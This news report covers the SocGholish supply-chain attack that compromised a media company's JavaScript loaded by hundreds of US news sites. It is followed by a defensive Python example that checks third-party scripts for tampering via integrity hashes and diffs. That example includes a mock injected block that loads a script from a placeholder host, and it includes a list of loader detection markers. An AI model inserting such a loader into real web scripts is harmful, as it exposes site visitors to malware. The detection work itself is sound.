250 US News Sites Compromised and Used to Push SocGholish Malware

Written by Andrew Doyle

November 3, 2022

Hackers are distributing the SocGholish JavaScript malware framework (also known as FakeUpdates) through the compromised infrastructure of an undisclosed media company.

The media company in question is a firm that provides both video content and advertising to major news outlets. “[It] serves many different companies in different markets across the United States,” said Sherrod DeGrippo, VP of Threat Research and Detection at Proofpoint.

It appears that the threat actor responsible for the supply-chain attack (tracked by Proofpoint as TA569) has injected malicious code into a benign JavaScript file that is loaded by the websites of the media outlets.

Malicious JavaScript File – Attacks Again After Remediation

This malicious JavaScript file installs SocGholish, which infects visitors to the compromised websites with malware payloads disguised as browser updates and delivered through fake update alerts (e.g., Chrome.Urdate.zip, Chrome.Updater.zip, Firefokh.Urdate.zip, Opera.Update.zip, Oper.Updte.zip).

In a Twitter thread, Proofpoint’s Threat Insight account stated: “Proofpoint Threat Research has observed intermittent injections on a media company that serves many major news outlets. This media company serves content via Javascript to its partners.

“By modifying the codebase of this otherwise benign JS, it is now used to deploy SocGholish.”

More than 250 U.S. news sites, among them major outlets, have been affected by the malware, according to security researchers at Proofpoint.

An exact count of affected news organizations is not available, but Proofpoint says it knows of affected media organizations (including national news outlets) in New York, Boston, Chicago, Miami, and Washington, D.C.

Another notable feature of this campaign is that the attacker returns soon after the initial compromise is remediated. Proofpoint’s researchers noted: “The situation needs to be closely monitored, as Proofpoint has observed TA569 reinfect the same assets just days after remediation.”
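The two defensive takeaways from the article are that a benign third-party script can be modified upstream of every site that loads it, and that the same asset may be modified again days after cleanup. The following added example (not code from the article, from Proofpoint, or from the affected media company) shows one way a site owner can keep a reviewed baseline of a third-party script, compute its Subresource Integrity value, and re-check the currently served copy for drift on a schedule. The script bodies, the function names `sri_integrity` and `check_drift`, and the `example.invalid` host are all constructed for the example.

```python
import base64
import difflib
import hashlib

# Constructed sample: the benign third-party script as it looked when the site
# owner last reviewed it (baseline), and a later copy with a block appended that
# loads a further script from elsewhere. Both bodies are made up for this example.
BASELINE_JS = """(function(){
  var player = document.getElementById('video-player');
  player.setAttribute('data-ads', 'enabled');
})();
"""

TAMPERED_JS = BASELINE_JS + """(function(){
  var s = document.createElement('script');
  s.src = 'https://example.invalid/placeholder.js';  // placeholder host, not a real indicator
  document.head.appendChild(s);
})();
"""

# Crude textual signals that appended code pulls in or writes more script.
# These are a triage hint for the reviewer, not a verdict.
LOADER_MARKERS = ("createElement('script')", 'createElement("script")', "document.write(")


def sri_integrity(script_body: str, algo: str = "sha384") -> str:
    """Return the Subresource Integrity value ("sha384-<base64>") for a script body."""
    digest = hashlib.new(algo, script_body.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def check_drift(baseline: str, current: str) -> dict:
    """Compare the currently served script against the reviewed baseline.

    Returns the two SRI values, whether they differ, the lines added and removed,
    and whether any added line looks like a script loader. A reviewer decides
    whether a change is a legitimate vendor update (and re-baselines) or not.
    """
    base_sri = sri_integrity(baseline)
    cur_sri = sri_integrity(current)
    diff = list(difflib.unified_diff(
        baseline.splitlines(), current.splitlines(), lineterm="", n=0))
    body = diff[2:]  # drop the '---'/'+++' file headers when a diff exists
    added = [line[1:] for line in body if line.startswith("+")]
    removed = [line[1:] for line in body if line.startswith("-")]
    return {
        "baseline_sri": base_sri,
        "current_sri": cur_sri,
        "changed": base_sri != cur_sri,
        "added_lines": added,
        "removed_lines": removed,
        "loads_external_script": any(m in line for line in added for m in LOADER_MARKERS),
    }


if __name__ == "__main__":
    report = check_drift(BASELINE_JS, TAMPERED_JS)
    print("integrity attribute for the reviewed copy:", report["baseline_sri"])
    print("changed:", report["changed"], "| loader-like code added:", report["loads_external_script"])
    for line in report["added_lines"]:
        print("+", line)
```

Pinning the baseline value in the page's `<script integrity="...">` attribute makes the browser refuse a modified file outright, but that only works for a vendor whose script does not change between reviews; for a frequently updated content or advertising script, the scheduled `check_drift` comparison is the practical fallback, and because the article notes reinfection days after cleanup, the comparison should keep running after remediation rather than being retired once the asset is clean.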
